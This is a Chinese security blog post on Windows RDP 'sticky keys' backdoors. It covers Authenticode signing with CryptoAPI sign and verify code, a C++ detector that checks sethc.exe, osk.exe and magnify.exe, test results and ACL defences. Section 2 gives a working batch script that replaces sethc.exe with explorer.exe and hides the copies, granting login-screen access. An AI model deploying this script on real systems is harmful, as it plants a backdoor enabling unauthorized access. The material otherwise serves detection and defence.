Windows 3389 RDP BackDoor Deployment Hacking && Detection

catalog

1. 3389后门种类

2. shift后门部署

3. 数字签名

4. shift后门检测

5. 测试验证

6. shift后门防御策略

 

1. 3389后门种类

1. windows放大镜后门: %SystemRoot%\system32\magnify.exe

2. windows屏幕键盘后门: %SystemRoot%\system32\osk.exe

3. windows shift后门: %SystemRoot%\system32\sethc.exe

Relevant Link:

http://baike.baidu.com/view/1400898.htm

 

2. shift后门部署

@echo off 

cls 

echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

echo. 

echo Shift后门 

echo.sproink 

@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe 

@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe 

@attrib c:\windows\system32\sethc.exe +h 

@attrib c:\windows\system32\dllcache\sethc.exe +h 

echo 使用方法:本文件执行完毕后, 

echo 在终端界面按Shift 5次即可登陆系统! 

echo. 

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe 

echo 完成百分之 50 

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe 

echo 完成百分之 80 

attrib c:\windows\system32\sethc.exe +h 

echo 完成百分之 90 

attrib c:\windows\system32\dllcache\sethc.exe +h 

echo 完成百分之 100 

cls 

echo. 

echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

echo 后门安装完毕! 

echo. 

echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

echo. 

echo. & pause 

exit

其他路径的后门的部署以此类推

Relevant Link:

http://www.jb51.net/hack/35093.html

 

3. 数字签名

0x1: windows数字签名

如果你是软件开发人员,你可能已经知道windows系统和一些浏览器(例如IE、Firefox)使用一种称为数字认证代码的技术来标识软件的发行商,来检查软件没有被病毒影响。如果你的软件没有用数字认证代码签名,用户将会收到一个警告"此软件发行商不能被成功的验证,你是否要继续运行此软件",很多的用户为了安全起见将放弃对此软件的使用
如果你的软件是提供给专业的人员使用,结果肯能会更糟。许多公司的IT安全策略禁止没有用数字认证码签名的软件的运行
同时微软Windows也使用数字签名证书来判断潜在的恶意软件。如果你的setup.exe没有进行数字认证证书的签名,你的软件的名誉将遭受损害
在Vista系统增加UAC之后,情况变的更糟,如果你的软件没有使用数字认证证书签名,且在运行时需要管理员的权限,则会出现警告对话框"不可识别的程序想访问你的计算机",这个时候很多的用户可能认为是病毒,会禁止使用你的软件

0x2: 数字认证码的原理

数字签名代码是一种技术,它使用数字证书来识别软件的发布商和使用hash算法来确保软件的完整性。数字签名使用公共密匙签名书法被创建,它使用两种不同的密匙:公共密匙和私有密匙,我们称其为密匙对。私有密匙一般为拥有者所有,公有密匙对所有的人都可见
数字签名的过程本质上为 

1. 签名软件对要签名的软件创建hash 

2. 使用发布者的私有密匙来加密软件的hash

3. 被加密的hash和发布者的数字证书被插入到要签名的软件

数字签名的验证过程本质上为

1. 用户对要验证的软件创建hash

2. 使用发布者的公共密匙来解密被加密的hash

3. 比较解密的hash和新获得的hash,如果匹配说明签名是正确的,软件没有被修改过

0x3: 数字签名

数字签名是对软件进行标识的一个流程,它通过对软件增加了发布商的信息来检查软件在发布后是否被修改或受病毒影响。在软件出售前进行签名已经成为了行业范围的专业实践。随着用户的安全意识的提高,现在越来越多的用户限制下载未签名的软件,因此作为专业的软件公司,在软件出售前进行签名已经成为必不可少的一步
要进行数字签名,需要以下准备 

1. 数字证书和密码 

2. 数字签名工具 

3. 时间戳服务器的URL地址

0x4: 数字签名工具

数字签名工具, 微软提供了两套数字签名工具

1. signcode.exe: 从1998年开始使用,随.NET Framework SDK发布 

    1) signcode.exe: 数字签名工具

    2) makecert.exe: 创建数字证书

    3) cert2spc.exe: 将数字证书转化为软件发布者证书格式



2. signtool.exe: 随visualstudio 2005及其以后的版本发布 

    1) signtool.exe: 数字签名工具

    2) makecert.exe: 创建数字证书

    3) cert2spc.exe: 将数字证书转化为软件发布者证书格式

    4) pvk2pfx.exe(pvkimprt.exe): 将私有的密匙和软件发布者证书合并为pfx文件,此文件将被signtool.exe使用

上面2中工具的不同是signcode.exe需要输入私有密匙和软件发布者证书(pvk和spc文件),signtool.exe只需要输入由pvk和spc合并产生的一个个人信息交互文件(pfx)

0x5: 数字签名加签代码示例: CryptoAPI

0x6: 数字签名验证代码示例: CryptoAPI

// Includes

#include <stdio.h>

#include <conio.h>

#include <windows.h> 

#include <wincrypt.h>  //需要装PLATFORM SDK

#pragma comment (lib, "crypt32.lib")



// Defines

#define CERT_PERSONAL_STORE_NAME  L"My"

#define CERT_OTHER_PEOPLE_STORE_NAME L"AddressBook"

#define MY_TYPE  (PKCS_7_ASN_ENCODING | X509_ASN_ENCODING)

#define BUFSIZE 1024



// Local functions

void Sign(wchar_t * SignerName, wchar_t * DataFileName, wchar_t * SignatureFileName);

void Verify(wchar_t * SignerName, wchar_t * SignatureFileName, wchar_t * DataFileName);



// ShowUsageAndExit

void ShowUsageAndExit()

{

    wprintf(L"Usage:\n");

    wprintf(L"   - To sign:   SignVerify s signer_name data_file signature_file\n");

    wprintf(L"   - To verify: SignVerify v signer_name data_file signature_file\n");

    wprintf(L"\n<< Press any key to continue >>\n");

    _getch();

    exit(1);



} 

// End of ShowUsageAndExit



// CheckError

void CheckError(BOOL condition, wchar_t * message)

{

    wprintf(message);

    if (condition)                                            

    {                                                    

        wprintf(L"SUCCESS\n");                            

    }                                                    

    else                                                

    {            

        // TODO: Some cleanup

        wprintf(L"FAILURE (0x%x)\n", GetLastError());

        wprintf(L"\n<< Press any key to continue >>\n");

        _getch();

        exit(1);

    }

}

// End CheckError



// Main

void wmain(int argc, wchar_t * argv[])

{



    // Usage

    if (argc != 5) {

        ShowUsageAndExit();

    }



    if (!wcscmp(argv[1], L"s"))

    {

        // Sign

        Sign(argv[2], argv[3], argv[4]);

    } 

    else if (!wcscmp(argv[1], L"v"))

    {

        // Verify

        Verify(argv[2], argv[3], argv[4]);

    } 

    else 

    {

        // Error

        ShowUsageAndExit();

    }



    // The end

    wprintf(L"\n<< Press any key to continue >>\n");

    _getch();



} 

// End of main



// Sign

void Sign(wchar_t * SignerName, wchar_t * DataFileName, wchar_t * SignatureFileName)

{

    // Variables

    HCERTSTORE hStoreHandle = NULL;

    PCCERT_CONTEXT pSignerCert = NULL;

    HCRYPTPROV hCryptProv = NULL;

    DWORD dwKeySpec = 0;

    HCRYPTHASH hHash = NULL;

    HANDLE hDataFile = NULL; 

    BOOL bResult = FALSE;

    BYTE rgbFile[BUFSIZE];

    DWORD cbRead = 0;

    DWORD dwSigLen = 0;

    BYTE * pbSignature = NULL;

    HANDLE hSignatureFile = NULL;

    DWORD lpNumberOfBytesWritten = 0;



    wprintf(L"SIGNING\n\n");



    // Open the certificate store.

    hStoreHandle = CertOpenStore(

        CERT_STORE_PROV_SYSTEM,

        0,

        NULL,

        CERT_SYSTEM_STORE_CURRENT_USER,

        CERT_PERSONAL_STORE_NAME

    );

    CheckError((BOOL)hStoreHandle, L"CertOpenStore....................... ");



    // Get signer's certificate with access to private key.

    do {

        // Get a certificate that matches the search criteria

        pSignerCert = CertFindCertificateInStore(

            hStoreHandle,

            MY_TYPE,

            0,

            CERT_FIND_SUBJECT_STR,

            SignerName,

            pSignerCert

        );

        CheckError((BOOL)pSignerCert, L"CertFindCertificateInStore.......... ");



        // Get the CSP, and check if we can sign with the private key            

        bResult = CryptAcquireCertificatePrivateKey(

            pSignerCert,

            0,

            NULL,

            &hCryptProv,

            &dwKeySpec,

            NULL

        );

        CheckError(bResult, L"CryptAcquireCertificatePrivateKey... ");



    } while ((dwKeySpec & AT_SIGNATURE) != AT_SIGNATURE);



    // Create the hash object.

    bResult = CryptCreateHash(

        hCryptProv, 

        CALG_MD5, 

        0, 

        0, 

        &hHash

    );

    CheckError(bResult, L"CryptCreateHash..................... ");



    // Open the file with the content to be signed 

    hDataFile = CreateFileW(DataFileName,

        GENERIC_READ,

        FILE_SHARE_READ,

        NULL,

        OPEN_EXISTING,

        FILE_FLAG_SEQUENTIAL_SCAN,

        NULL

    );

    CheckError((hDataFile != INVALID_HANDLE_VALUE), L"CreateFile.......................... ");



    // Compute the cryptographic hash of the data.

    while (bResult = ReadFile(hDataFile, rgbFile, BUFSIZE, &cbRead, NULL))

    {

        if (cbRead == 0)

        {

            break;

        }

        CheckError(bResult, L"ReadFile............................ ");



        bResult = CryptHashData(

            hHash, 

            rgbFile, 

            cbRead, 

            0

        );

        CheckError(bResult, L"CryptHashData....................... ");



    }

    CheckError(bResult, L"ReadFile............................ ");



    // Sign the hash object

    dwSigLen = 0;

    bResult = CryptSignHash(

        hHash, 

        AT_SIGNATURE, 

        NULL, 

        0, 

        NULL, 

        &dwSigLen

    );

    CheckError(bResult, L"CryptSignHash....................... ");



    pbSignature = (BYTE *)malloc(dwSigLen);

    CheckError((BOOL)pbSignature, L"malloc.............................. ");



    bResult = CryptSignHash(

        hHash, 

        AT_SIGNATURE, 

        NULL, 

        0, 

        pbSignature, 

        &dwSigLen

    );

    CheckError(bResult, L"CryptSignHash....................... ");



    // Create a file to save the signature

    hSignatureFile = CreateFileW(

        SignatureFileName,

        GENERIC_WRITE,

        0,

        NULL,

        CREATE_ALWAYS,

        FILE_ATTRIBUTE_NORMAL,

        NULL

    );

    CheckError((hSignatureFile != INVALID_HANDLE_VALUE), L"CreateFile.......................... ");



    // Write the signature to the file

    bResult = WriteFile(

        hSignatureFile, 

        (LPCVOID)pbSignature, 

        dwSigLen, 

        &lpNumberOfBytesWritten, 

        NULL

    );

    CheckError(bResult, L"WriteFile........................... ");



     // Clean up and free memory.

    free(pbSignature);



    CloseHandle(hDataFile);

    CloseHandle(hSignatureFile);



    bResult = CryptDestroyHash(hHash);

    CheckError(bResult, L"CryptDestroyHash.................... ");



    bResult = CertFreeCertificateContext(pSignerCert);

    CheckError(bResult, L"CertFreeCertificateContext.......... ");



    bResult = CertCloseStore(

        hStoreHandle, 

        CERT_CLOSE_STORE_CHECK_FLAG

    );

    CheckError(bResult, L"CertCloseStore...................... ");



} 

// End of Sign



// Verify

void Verify(wchar_t * SignerName, wchar_t * DataFileName, wchar_t * SignatureFileName)

{

    // Variables

    HCERTSTORE hStoreHandle = NULL;

    PCCERT_CONTEXT pSignerCert = NULL;

    DWORD dwKeySpec = 0;

    HCRYPTPROV hCryptProv = NULL;

    HCRYPTHASH hHash = NULL;

    HANDLE hDataFile = NULL;

    BOOL bResult = FALSE;

    BYTE rgbFile[BUFSIZE];

    DWORD cbRead = 0;

    HANDLE hSignatureFile = NULL;

    BYTE * pbBinary = NULL;

    DWORD cbBinary = 0;

    HCRYPTKEY hPubKey = NULL;



    wprintf(L"VERIFYING\n\n");



    // Open the certificate store.

    hStoreHandle = CertOpenStore(

        CERT_STORE_PROV_SYSTEM,

        0,

        NULL,

        CERT_SYSTEM_STORE_CURRENT_USER,

        CERT_PERSONAL_STORE_NAME    

    );

    CheckError((BOOL)hStoreHandle, L"CertOpenStore....................... ");



    // Get a certificate that matches the search criteria

    pSignerCert = CertFindCertificateInStore(

        hStoreHandle,

        MY_TYPE,

        0,

        CERT_FIND_SUBJECT_STR,

        SignerName,

        pSignerCert

    );

    CheckError((BOOL)pSignerCert, L"CertFindCertificateInStore.......... ");



    // Get the CSP

    bResult = CryptAcquireContext(

        &hCryptProv,

        NULL,

        NULL,

        PROV_RSA_FULL,

        CRYPT_VERIFYCONTEXT

    );

    CheckError(bResult, L"CryptAcquireContext................. ");



    // Create the hash object.

    bResult = CryptCreateHash(

        hCryptProv, 

        CALG_MD5, 

        0, 

        0, 

        &hHash

    );

    CheckError(bResult, L"CryptCreateHash..................... ");



    // Open the file with the content that was signed.

    hDataFile = CreateFileW(

        DataFileName,

        GENERIC_READ,

        FILE_SHARE_READ,

        NULL,

        OPEN_EXISTING,

        FILE_FLAG_SEQUENTIAL_SCAN,

        NULL

    );

    CheckError((hDataFile != INVALID_HANDLE_VALUE), L"CreateFile.......................... ");



    // Compute the cryptographic hash of the data.

    while (bResult = ReadFile(hDataFile, rgbFile, BUFSIZE, &cbRead, NULL))

    {

        if (cbRead == 0)

        {

            break;

        }

        CheckError(bResult, L"ReadFile............................ ");



        bResult = CryptHashData(

            hHash, 

            rgbFile, 

            cbRead, 

            0

        );

        CheckError(bResult, L"CryptHashData....................... ");

    }

    CheckError(bResult, L"ReadFile............................ ");



    // Open the file with the signature

    hSignatureFile = CreateFileW(

        SignatureFileName,

        GENERIC_READ,

        FILE_SHARE_READ,

        NULL,

        OPEN_EXISTING,

        FILE_FLAG_SEQUENTIAL_SCAN,

        NULL

    );

    CheckError((hSignatureFile != INVALID_HANDLE_VALUE), L"CreateFile.......................... ");



    // Read the signature from the file

    pbBinary = (BYTE *)malloc(BUFSIZE);

    CheckError((BOOL)pbBinary, L"malloc.............................. ");

        

    bResult = ReadFile(hSignatureFile, pbBinary, BUFSIZE, &cbBinary, NULL);

    CheckError(bResult, L"ReadFile............................ ");



    // Get the public key from the certificate

    CryptImportPublicKeyInfo(

        hCryptProv, 

        MY_TYPE,

        &pSignerCert->pCertInfo->SubjectPublicKeyInfo,

        &hPubKey

    );

    CheckError(bResult, L"CryptImportPublicKeyInfo............ ");



    // Verify the signature

    bResult = CryptVerifySignature(

        hHash, 

        pbBinary, 

        cbBinary, 

        hPubKey,

        NULL, 

        0

    );

    CheckError(bResult, L"CryptVerifySignature................ ");



    // Clean up and free memory.

    free(pbBinary);



    CloseHandle(hDataFile);

    CloseHandle(hSignatureFile);



    bResult = CryptDestroyHash(hHash);

    CheckError(bResult, L"CryptDestroyHash.................... ");

 

    bResult = CertFreeCertificateContext(pSignerCert);

    CheckError(bResult, L"CertFreeCertificateContext.......... ");



    bResult = CertCloseStore(

        hStoreHandle, 

        CERT_CLOSE_STORE_CHECK_FLAG

    );

    CheckError(bResult, L"CertCloseStore...................... ");



    bResult = CryptReleaseContext(

        hCryptProv,

        0

    );

    CheckError(bResult, L"CryptReleaseContext................. ");

} 

// End of Verify

Relevant Link:

http://blogs.msdn.com/b/alejacma/archive/2008/01/23/how-to-sign-and-verify-with-cryptoapi-and-a-user-certificate.aspx

http://blogs.msdn.com/b/alejacma/archive/2008/02/20/how-to-sign-exe-files-with-an-authenticode-certificate-vb-net.aspx

http://blogs.msdn.com/b/alejacma/archive/2008/12/11/how-to-sign-exe-files-with-an-authenticode-certificate-part-2.aspx

http://blogs.msdn.com/b/alejacma/archive/tags/cryptoapi/

http://blog.csdn.net/wowolook/article/details/17259635

http://www.cnblogs.com/itech/archive/2011/07/21/2110924.html

http://www.pudn.com/downloads75/sourcecode/windows/system/detail273193.html

https://msdn.microsoft.com/en-us/library/aa388208(v=VS.85).aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/aa388171(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/aa387764(v=vs.85).aspx

 

4. shift后门检测

0x1: 检测思路

1. 检查%SystemRoot%\system32\sethc.exe文件是否包含windows合法签名

2. 检查%SystemRoot%\system32\sethc.exe文件是否包含正常setth程序的二进制特征码

0x2: Code Example

// AliHealthExamination.cpp : 定义控制台应用程序的入口点。

//



#include <io.h>

#include <fstream>  

#include <iostream>

#include <string>  

#include "Cverify.h"

#include "JsonEasy.h"

using namespace std;  

  

#pragma comment(lib,"lib_json")  

#pragma comment(lib, "version.lib")

 

char* TCHAR2char(TCHAR* tchStr) 

{ 

    int iLen = 2 * wcslen(tchStr);//CString,TCHAR汉字算一个字符,因此不用普通计算长度 

    char * chRtn = new char[iLen+1];

    wcstombs(chRtn, tchStr, iLen+1);//转换成功返回为非负值 

    return chRtn; 

} 





HRESULT FileBinaryCheck(TCHAR exeName[], JsonEasy & JsonResult) 

{

    int Bresult_sethc = -1, Bresult_osk = -1, Bresult_magnify = -1;

    int temResult_magnify, temResult_screenmagnifier;

    DWORD dwSize; 

    DWORD dwRtn; 

    //file ersion info

    TCHAR* szVersion; 

    CString csVersion; 



    //get the size of version info 

    dwSize = GetFileVersionInfoSize(exeName, NULL);  

    if (dwSize == 0) 

    {  

        //在windows server 2003、2008、windows7上屏幕放大键的程序名是不同的,当传入错误的程序名时,这里会打开失败而自动退出

        return E_FAIL; 

    }

    char *pBuf; 

    pBuf = new char[dwSize + 1]; 

    if(pBuf == NULL)

    { 

        return E_FAIL;

    } 

    memset(pBuf, 0, dwSize + 1);

    //get file version information

    dwRtn = GetFileVersionInfo(exeName ,NULL, dwSize, pBuf); 

    if(dwRtn == 0) 

    {  

        return E_FAIL;

    }

    LPVOID lpBuffer = NULL;

    UINT uLen = 0; 



    //pBuf: Pointer to a buffer that receives the file-version information.

    //Retrieves specified version information from the specified version-information resource. 

    dwRtn = VerQueryValue(pBuf, 

    TEXT("\\StringFileInfo\\080404b0\\OriginalFilename"), //0804: 中文、04b0: 1252ANSI   

    //可以测试的属性

    /*

    CompanyName 

    FileDescription 

    FileVersion 

    InternalName 

    LegalCopyright

    OriginalFilename

    ProductName 

    ProductVersion 

    Comments

    LegalTrademarks 

    PrivateBuild 

    SpecialBuild 

    */         

    &lpBuffer, 

    &uLen); 

    if(dwRtn == 0) 

    {  

        return E_FAIL;

    }

     

    //get output

    //这里获得的文件名可能magnify.exe、screenmagnifier.exe

    szVersion = (TCHAR*)lpBuffer; 

    //check result(对magnify单独做特殊处理)

    csVersion = (CString)szVersion; 

    csVersion.MakeLower();  



    CString ssExeName( exeName );

    if(ssExeName.Find(_T("sethc.exe")) != -1 )

    {

        JsonResult.execinfoItemSethc["binarycoderesult"] = TCHAR2char(szVersion);

        Bresult_sethc = csVersion.Find(_T("sethc.exe"));

    }

    else if(ssExeName.Find(_T("osk.exe")) != -1 )

    {  

        JsonResult.execinfoItemOsk["binarycoderesult"] = TCHAR2char(szVersion);

        Bresult_osk = csVersion.Find(_T("osk.exe"));  

    }

    //else if(ssExeName.CompareNoCase(_T("magnifier.exe")) == 0 || ssExeName.CompareNoCase(_T("magnify.exe")) == 0 )

    else if(ssExeName.Find(_T("magnify.exe")) != -1 )

    {

        JsonResult.execinfoItemMagnify["binarycoderesult"] = TCHAR2char(szVersion); 

        temResult_magnify = csVersion.Find(_T("magnify.exe"));  

        temResult_screenmagnifier = csVersion.Find(_T("screenmagnifier.exe")); 

        Bresult_magnify = ( (temResult_magnify != -1) || (temResult_screenmagnifier != -1) ) ? 1 : -1;

    } 



    if( (Bresult_sethc != -1) || (Bresult_osk != -1) || (Bresult_magnify != -1) )

    { 

        return S_OK;  

    }

    else

    {

        return E_FAIL;

    }  

}





HRESULT SignatureCheck(TCHAR exePath[], JsonEasy & JsonResult)

{  

    //sigName: signature name

    CStdString sigName;  

    CString csExePath;  



    //new CFileDigitalSignVerify

    CFileDigitalSignVerify fileVerifySign = CFileDigitalSignVerify(); 

    //verify the sethc fileSign

    VERIFY_RESULT signResult = fileVerifySign.VerifyFileBySmartMode(exePath, sigName);



    //如果用户对sethc.exe、osk.exe、magnify.exe进行了加固,则直接判定为正常 



    //get the sign info json 

    csExePath = (CString)exePath;

    if(csExePath.Find(_T("sethc.exe")) != -1)

    {

        JsonResult.execinfoItemSethc["exename"] = TCHAR2char(exePath); 

        JsonResult.execinfoItemSethc["signcheckresult"] = TCHAR2char((TCHAR*)sigName.GetData());

        JsonResult.execinfoItemSethc["trustcheckresult"] = signResult == 0 ? "VrUnknown" : signResult == 1 ? "VrNoSignature" : signResult == 2 ? "VrTrusted" : signResult == 3 ? "VrExpired" : signResult == 4 ? "VrRevoked" : signResult == 5 ? "VrDistrust" : signResult == 6 ? "VrSecuritySettings" : "";

    }

    else if(csExePath.Find(_T("osk.exe")) != -1)

    {

        JsonResult.execinfoItemOsk["exename"] = TCHAR2char(exePath); 

        JsonResult.execinfoItemOsk["signcheckresult"] = TCHAR2char((TCHAR*)sigName.GetData());

        JsonResult.execinfoItemOsk["trustcheckresult"] = signResult == 0 ? "VrUnknown" : signResult == 1 ? "VrNoSignature" : signResult == 2 ? "VrTrusted" : signResult == 3 ? "VrExpired" : signResult == 4 ? "VrRevoked" : signResult == 5 ? "VrDistrust" : signResult == 6 ? "VrSecuritySettings" : "";

    }

    else if(csExePath.Find(_T("magnify.exe")) != -1)

    {

        JsonResult.execinfoItemMagnify["exename"] = TCHAR2char(exePath); 

        JsonResult.execinfoItemMagnify["signcheckresult"] = TCHAR2char((TCHAR*)sigName.GetData());

        JsonResult.execinfoItemMagnify["trustcheckresult"] = signResult == 0 ? "VrUnknown" : signResult == 1 ? "VrNoSignature" : signResult == 2 ? "VrTrusted" : signResult == 3 ? "VrExpired" : signResult == 4 ? "VrRevoked" : signResult == 5 ? "VrDistrust" : signResult == 6 ? "VrSecuritySettings" : "";

    }



    //Microsoft versign

    CString csSigName = CString((TCHAR*)sigName.GetData());  

    int vResult = csSigName.Find(L"O=Microsoft Corporation");

     

    if(vResult != -1)

    { 

        if(signResult == 2)

        {  

            //VrTrusted

            return S_OK;

        }

        else

        {

            //NOT VrTrusted

            return E_FAIL;

        }

    } 

    else

    {

        return E_FAIL;

    } 

}





int main(int argc, char* argv[])

{ 

    //parameter check

    std::string action;

    if (argc <= 1) 

    {

        std::cout << "usage: " << argv[0] << " --suspicion-account" << std::endl;

        return 0;

    } 

    else 

    {

        action = argv[1];

    }



    //main func

    if (action == "--suspicion-account") 

    { } 

    else if (action == "--port-scan") 

    { } 

    else if (action == "--system-vulscan") 

    { } 

    else if(action == "--3389-backdoor")

    {

        JsonEasy JsonResult = JsonEasy();



        //check sign

        TCHAR sethcPath[MAX_PATH] = _T(""); 

        TCHAR oskPath[MAX_PATH] = _T(""); 

        TCHAR magnifyPath[MAX_PATH] = _T(""); 



        //get system32 path

        TCHAR lpszFileFullPath[MAX_PATH]; 

        GetSystemDirectory(lpszFileFullPath, sizeof(lpszFileFullPath)); 

        lstrcat(lpszFileFullPath, _T("\\"));

        //lpszFileFullPath = %SystemRoot%\system32\sethc.exe

        lstrcat(sethcPath, lpszFileFullPath);

        lstrcat(sethcPath, _T("sethc.exe"));

        //lpszFileFullPath = %SystemRoot%\system32\osk.exe

        lstrcat(oskPath, lpszFileFullPath);

        lstrcat(oskPath, _T("osk.exe"));

        //lpszFileFullPath = %SystemRoot%\system32\magnify.exe

        lstrcat(magnifyPath, lpszFileFullPath);

        lstrcat(magnifyPath, _T("magnify.exe"));   



        {

            //which hava read permission, go on

            //SignatureCheck result: S_OK or E_FAIL

            HRESULT SresultSethc = SignatureCheck(sethcPath, JsonResult);

            HRESULT SresultOsk = SignatureCheck(oskPath, JsonResult);

            HRESULT SresultMagnify = SignatureCheck(magnifyPath, JsonResult);  

            

            //may be angly

            if(SresultSethc == S_OK)

            {

                if(SresultOsk == S_OK)

                {

                    if(SresultMagnify == S_OK)

                    {

                        //if SignatureCheck is ok, then we go on

                        //certificate check is ok, go on binary characteristics 

                        //if the program contains correct binary program name,then ok

                        HRESULT BresultSethc = FileBinaryCheck(sethcPath, JsonResult);

                        HRESULT BresultOsk = FileBinaryCheck(oskPath, JsonResult);

                        HRESULT BresultMagnify = FileBinaryCheck(magnifyPath, JsonResult);  



                        if(BresultSethc == S_OK && BresultOsk == S_OK && BresultMagnify == S_OK )

                        { 

                            JsonResult.jRoot["isvul"] = 0;

                        }

                        else

                        {

                            JsonResult.jRoot["isvul"] = 1;

                        }

                    }

                    else

                    { 

                        //std::wcout << "JsonResult.execinfoItemMagnify: " << JsonResult.execinfoItemMagnify["signcheckresult"].empty() << std::endl;

                        //magnify.exe

                        //check target is if accessable

                        if ( JsonResult.execinfoItemMagnify["signcheckresult"].empty() == 0 )

                        {   

                            JsonResult.jRoot["isvul"] = 0; 

                            JsonResult.execinfoItemMagnify["exename"] = TCHAR2char(magnifyPath); 

                            JsonResult.execinfoItemMagnify["signcheckresult"] = "CN=Microsoft Windows Component Publisher, O=Microsoft Corporation, L=Redmond, S=Washington, C=US";

                            JsonResult.execinfoItemMagnify["trustcheckresult"] = "VrTrusted";

                            JsonResult.execinfoItemMagnify["binarycoderesult"] = "Target Program Has Been Reinforcemented";  

                        }  

                        else

                        {

                            JsonResult.jRoot["isvul"] = 1;

                        }

                    }

                }

                else

                {

                    //osk.exe

                    //check target is if accessable

                    if ( JsonResult.execinfoItemOsk["signcheckresult"].empty() == 0 )

                    {

                        JsonResult.jRoot["isvul"] = 0;

                        JsonResult.execinfoItemOsk["exename"] = TCHAR2char(oskPath); 

                        JsonResult.execinfoItemOsk["signcheckresult"] = "CN=Microsoft Windows Component Publisher, O=Microsoft Corporation, L=Redmond, S=Washington, C=US";

                        JsonResult.execinfoItemOsk["trustcheckresult"] = "VrTrusted";

                        JsonResult.execinfoItemOsk["binarycoderesult"] = "Target Program Has Been Reinforcemented";      

                    }

                    else

                    {

                        JsonResult.jRoot["isvul"] = 1;

                    }

                }

            }

            else

            {

                //sethc.exe

                //check target is if accessable

                if ( JsonResult.execinfoItemSethc["signcheckresult"].empty() == 0 )

                {

                    //no read permission

                    JsonResult.jRoot["isvul"] = 0; 

                    JsonResult.execinfoItemSethc["exename"] = TCHAR2char(sethcPath); 

                    JsonResult.execinfoItemSethc["signcheckresult"] = "CN=Microsoft Windows Component Publisher, O=Microsoft Corporation, L=Redmond, S=Washington, C=US";

                    JsonResult.execinfoItemSethc["trustcheckresult"] = "VrTrusted";

                    JsonResult.execinfoItemSethc["binarycoderesult"] = "Target Program Has Been Reinforcemented";   

                }

                else

                {

                    JsonResult.jRoot["isvul"] = 1;

                }

            } 

        } 



        //wrapper protocol 

        JsonResult.jRoot["moduleid"] = 1;

        JsonResult.jRoot["execresult"] = 1; 

        JsonResult.execinfoArrayObj.append(JsonResult.execinfoItemSethc);

        JsonResult.execinfoArrayObj.append(JsonResult.execinfoItemOsk);

        JsonResult.execinfoArrayObj.append(JsonResult.execinfoItemMagnify);

        JsonResult.jRoot["execinfo"] = JsonResult.execinfoArrayObj;



        //output finnal result

        std::string out = JsonResult.jRoot.toStyledString();

        std::cout << out << std::endl;

         

    } 

    return 0;

}

需要注意的几个问题是

1. 在windows7、windows server 2003、windows server 2012系统上,屏幕放大器的程序名都是magnify.exe,但是原始程序名是不同的,可能有magnify.exe、screenmagnifier.exe,在检测程序中需要做兼容

2. 如果采取了对sethc.exe、osk.exe、magnify.exe的加固(设置everyone完全拒绝),则程序无法正常获取到目标程序的版本信息,在检测程序中需要做兼容

3. 如果目标程序无法读取,即无法正常获取程序签名、版本信息,则假定目标程序为正常: 最小误判原则

4. sethc.exe、osk.exe、magnify.exe中同时出现

    1) 程序被替换

    2) everyone权限被取消

则需要单独标记出来

为了简化上述问题,我们定义以下基本假设

1. 如果因为NTFS ACL权限问题获取不到目标进程的签名和版本信息,则认定目标进程也无法被黑客用来进行shift后门运行登录,因为只有程序可读/可执行,这个shift后门才本质存在

2. 在NTFS ACL权限正常的情况下,不管是"copy explorer"、还是"copy virus"的shift后门部署方式,签名+二进制版本信息特征的逻辑都能正常检测出来

0x1: System32,Syswow64的区别

1. "WOW64"的意思是"Windows On Windows64"

2. 在32bit下,system32里保存的是32bit的程序

3. 在64bit下,system32里保存的是64bit的程序,SysWOW64里保存的是32bit的程序

4. 32位软件并不能在64位系统中直接运行,所以微软设计了WoW64(Windows-on-Windows 64-bit),通过Wow64.dll、Wow64win.dll、Wow64cpu.dl三个DLL文件进行32位和64位系统的切换来运行32位软件

Relevant Link: 

http://www.cnblogs.com/pythonschool/archive/2012/11/10/2764517.html

http://www.ssdax.com/196.html

http://blog.csdn.net/fly2leo/article/details/11620273

 

5. 测试验证

1. windows server 2003: 未部署shift后门/部署shift后门,检测程序均工作正常

2. windows server 2008: 未部署shift后门/部署shift后门,检测程序均工作正常

3. windows server 2012: 未部署shift后门/部署shift后门,检测程序均工作正常

4. 32bit操作系统下测试通过

 

 

6. shift后门防御策略

0x1: 拒绝使用sethc.exe

1. 首先找到C:\WINDOWS\system32、C:\WINDOWS\system32\dllcache下的seth.exe。

2. 删除所有文件安全设置下的用户,将"Everyone的权限"列表框中的选项,全部勾选"拒绝"复选框

0x2: 禁用Shift键

登录服务器后,连续按5次Shift键,在弹出的对话框中单击"设置"按钮,然后会弹出"辅助选项设置"对话框,取消对所有复选框的勾选

Relevant Link:

http://server.zzidc.com/fwqcjwt/502.html

 

Copyright (c) 2015 Little5ann All rights reserved

 

你可能感兴趣的:(windows)

  • linux sdl windows.h,Windows下的SDL安装 奔跑吧linux内核 linuxsdlwindows.h
    首先你要下载并安装SDL开发包。如果装在C盘下,路径为C:\SDL1.2.5如果在WINDOWS下。你可以按以下步骤:1.打开VC++,点击"Tools",Options2,点击directories选项3.选择"Includefiles"增加一个新的路径。"C:\SDL1.2.5\include"4,现在选择"Libaryfiles“增加"C:\SDL1.2.5\lib"现在你可以开始编写你的第
  • 将cmd中命令输出保存为txt文本文件 落难Coder Windowscmdwindow
    最近深度学习本地的训练中我们常常要在命令行中运行自己的代码,无可厚非,我们有必要保存我们的炼丹结果,但是复制命令行输出到txt是非常麻烦的,其实Windows下的命令行为我们提供了相应的操作。其基本的调用格式就是:运行指令>输出到的文件名称或者具体保存路径测试下,我打开cmd并且ping一下百度:pingwww.baidu.com>./data.txt看下相同目录下data.txt的输出:如果你再
  • PHP环境搭建详细教程 好看资源平台 前端php
